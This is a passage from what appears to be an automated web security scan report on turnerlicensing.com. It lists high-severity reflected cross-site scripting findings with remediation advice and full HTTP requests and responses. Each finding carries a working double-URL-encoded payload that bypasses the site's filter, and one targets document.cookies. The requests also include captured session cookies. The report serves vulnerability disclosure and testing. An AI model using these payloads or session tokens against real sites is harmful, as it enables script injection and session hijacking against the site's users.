This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /home?b6ece%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25270391ff654b2=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:50:58 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:50:58 GMT
NS_RTIMER_COMPOSITE: 1114175657:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=997
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 41742


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Homepage - Turner</title>


<meta name=...robots... content=...NOODP,NOYDIR...>
<script language='JavaScript'
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?sc=1&b6ece%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25270391ff654b2=1&fromsla=T&b6ece'style='x:expression(alert(1))'0391ff654b2=1&b6ece%27style%3d%27x%3aexpression%28alert%281%29%29%270391ff654b2=1'>
...[SNIP]...

1.68. http://www.turnerlicensing.com/magnetic_to-do_notes [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /magnetic_to-do_notes

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ea298%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25273a5ce7edc7c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ea298'style='x:expression(alert(1))'3a5ce7edc7c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /magnetic_to-do_notes?ea298%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25273a5ce7edc7c=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:51:26 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -811349489:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=800
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 100729


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Magnetic To-Do Notes</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...'
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?category=262182&ea298%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25273a5ce7edc7c=1&ea298'style='x:expression(alert(1))'3a5ce7edc7c=1&fromsla=T&ea298%27style%3d%27x%3aexpression%28alert%281%29%29%273a5ce7edc7c=1'>
...[SNIP]...

1.69. http://www.turnerlicensing.com/memo_books [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /memo_books

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 70115%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527e817eec67bd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 70115'style='x:expression(alert(1))'e817eec67bd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /memo_books?70115%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527e817eec67bd=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:51:32 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -811347759:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=894
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 100245


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Memo Books</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>
...[SNIP]...
erlicensing.com/s.nl?category=175951&70115%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527e817eec67bd=1&fromsla=T&70115%27style%3d%27x%3aexpression%28alert%281%29%29%27e817eec67bd=1&70115'style='x:expression(alert(1))'e817eec67bd=1'>
...[SNIP]...

1.70. http://www.turnerlicensing.com/nondated_combo_packs [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /nondated_combo_packs

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d1120%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25278f5f8e675c5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d1120'style='x:expression(alert(1))'8f5f8e675c5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /nondated_combo_packs?d1120%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25278f5f8e675c5=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:51:35 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: 778540437:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=822
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 100037


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Nondated Combo Packs</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...'
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?category=175958&d1120%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25278f5f8e675c5=1&fromsla=T&d1120'style='x:expression(alert(1))'8f5f8e675c5=1&d1120%27style%3d%27x%3aexpression%28alert%281%29%29%278f5f8e675c5=1'>
...[SNIP]...

1.71. http://www.turnerlicensing.com/paper_and_desk_caddy [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /paper_and_desk_caddy

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 524ea%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252708e0d4230be was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 524ea'style='x:expression(alert(1))'08e0d4230be in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /paper_and_desk_caddy?524ea%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252708e0d4230be=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:51:32 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: 226384085:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=875
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 76479


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Paper & Desk Caddy</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';<
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?category=175960&524ea%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252708e0d4230be=1&524ea'style='x:expression(alert(1))'08e0d4230be=1&524ea%27style%3d%27x%3aexpression%28alert%281%29%29%2708e0d4230be=1&fromsla=T'>
...[SNIP]...

1.72. http://www.turnerlicensing.com/paper_cubes [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /paper_cubes

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1b6f7%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252757f8f7591a8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1b6f7'style='x:expression(alert(1))'57f8f7591a8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /paper_cubes?1b6f7%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252757f8f7591a8=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:51:40 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -2034792773:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=894
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 100156


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Paper Cubes</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script
...[SNIP]...
erlicensing.com/s.nl?category=175961&1b6f7%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252757f8f7591a8=1&1b6f7%27style%3d%27x%3aexpression%28alert%281%29%29%2757f8f7591a8=1&fromsla=T&1b6f7'style='x:expression(alert(1))'57f8f7591a8=1'>
...[SNIP]...

1.73. http://www.turnerlicensing.com/portfolios [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /portfolios

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 2f0f7%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527b5a9e77cfd5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2f0f7'style='x:expression(alert(1))'b5a9e77cfd5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /portfolios?2f0f7%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527b5a9e77cfd5=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:51:41 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: 778542058:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=943
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 100187


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Portfolios</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?category=175962&2f0f7%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527b5a9e77cfd5=1&fromsla=T&2f0f7'style='x:expression(alert(1))'b5a9e77cfd5=1&2f0f7%27style%3d%27x%3aexpression%28alert%281%29%29%27b5a9e77cfd5=1'>
...[SNIP]...

1.74. http://www.turnerlicensing.com/s.nl [bce72 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /s.nl

Issue detail

The value of the bce72 request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload b393c%2520style%253dx%253aexpr%252f%252a%252a%252fession%2528alert%25281%2529%2529%2520c6dfa1617f7 was submitted in the bce72 parameter. This input was echoed as b393c style=x:expr/**/ession(alert(1)) c6dfa1617f7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the bce72 request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /s.nl?sc=69&category=144026&bce72%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527b0f27be55e7=1&bce72%27style%3d%27x%3aexpression%28alert%281%29%29%27b0f27be55e7=1&bce72b393c%2520style%253dx%253aexpr%252f%252a%252a%252fession%2528alert%25281%2529%2529%2520c6dfa1617f7 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=BN31MyMZn0Q1slsnpLHnThdkxP6y1N1JNFlS0hfpWkVsp1130MW9Nw9XgbYyLGL53vhMQbkNkWLvWqQpnsLM08zMhW1sTxxnTbfGJxyb3pytvSynJwcn27dTRjv6McpG!-1715434465; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274971.1290275978.10; __utmc=1; __utmb=1.3.10.1290275978;

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 20:33:58 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 20:33:59 GMT
NS_RTIMER_COMPOSITE: 335974439:73686F702D6A6176613033362E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=TGPJMywWWcLQTG5R7TRCK3kDRxpbb6TR45JRWHpph3k5yyqSTwhKCvKJlN88qkCbl7CVTysnZlp6JGxfvVf3J2s6zpwQgBfVTvzFnlZjWLBBCxJJPvnzzLvxSXG0LY8Z!-1715434465; path=/
Set-Cookie: NLShopperId3=rnoX2q9XAatYKaJC; domain=.turnerlicensing.com; expires=Saturday, 27-Nov-2010 20:34:01 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=913
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 95016


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Boston Celtics</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</scr
...[SNIP]...
le%3d%27x%3aexpression%28alert%281%29%29%27b0f27be55e7=1&bce72b393c style=x%3Aexpr%2F**%2Fession%28alert%281%29%29+c6dfa1617f7%3D&bce72'style=%27x%3Aexpression%28alert%281%29%29%27b0f27be55e7%3D1&bce72b393c style=x:expr/**/ession(alert(1)) c6dfa1617f7=&fromsla=T'>
...[SNIP]...

1.75. http://www.turnerlicensing.com/s.nl [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.turnerlicensing.com
Path:   /s.nl

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 9411e%2520a%253dbc04429bed98 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9411e a=bc04429bed98 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /s.nl?sc=69&category=144026&bce72%2527style%253d%2527x%253aexpression%2528alert%2528document.cookies%2529%2529%2527b0f27be55e7=1&source=google_content_nba&bce72&9411e%2520a%253dbc04429bed98=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=BN31MyMZn0Q1slsnpLHnThdkxP6y1N1JNFlS0hfpWkVsp1130MW9Nw9XgbYyLGL53vhMQbkNkWLvWqQpnsLM08zMhW1sTxxnTbfGJxyb3pytvSynJwcn27dTRjv6McpG!-1715434465; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274971.1290275978.10; __utmc=1; __utmb=1.3.10.1290275978;

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 20:36:39 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 20:36:39 GMT
NS_RTIMER_COMPOSITE: 1583724585:73686F702D6A6176613033362E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=Z1ydMyxX6yLlyYkl2jyXm6wQShBvpjL6sxRhPr3WLx9lR141cVrYGRZgcSTFRY628H2ZhL0LSMLyYJnBhhJ3ZGVy3JnmGwJhXbVkVJbv6d0fxT2BjTNh0wTHVGp8gKs8!-1715434465; path=/
Set-Cookie: NLShopperId3=rnoX2q9XAatYKaJC; domain=.turnerlicensing.com; expires=Saturday, 27-Nov-2010 20:36:41 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=848
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 94985


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Boston Celtics</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</scr
...[SNIP]...
f27be55e7=1&bce72=&bce72'style=%27x%3Aexpression%28alert%28document.cookies%29%29%27b0f27be55e7%3D1&source=google_content_nba&bce72'style='x:expression(alert(document.cookies))'b0f27be55e7=1&fromsla=T&9411e a=bc04429bed98%3D1'>
...[SNIP]...

1.76. http://www.turnerlicensing.com/s.nl [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /s.nl

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c93f8%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25271465883b49a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c93f8'style='x:expression(alert(1))'1465883b49a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /s.nl?renderableItem=%2Fshow%2F15&c=1034828&n=3&c93f8%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25271465883b49a=1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.turnerlicensing.com
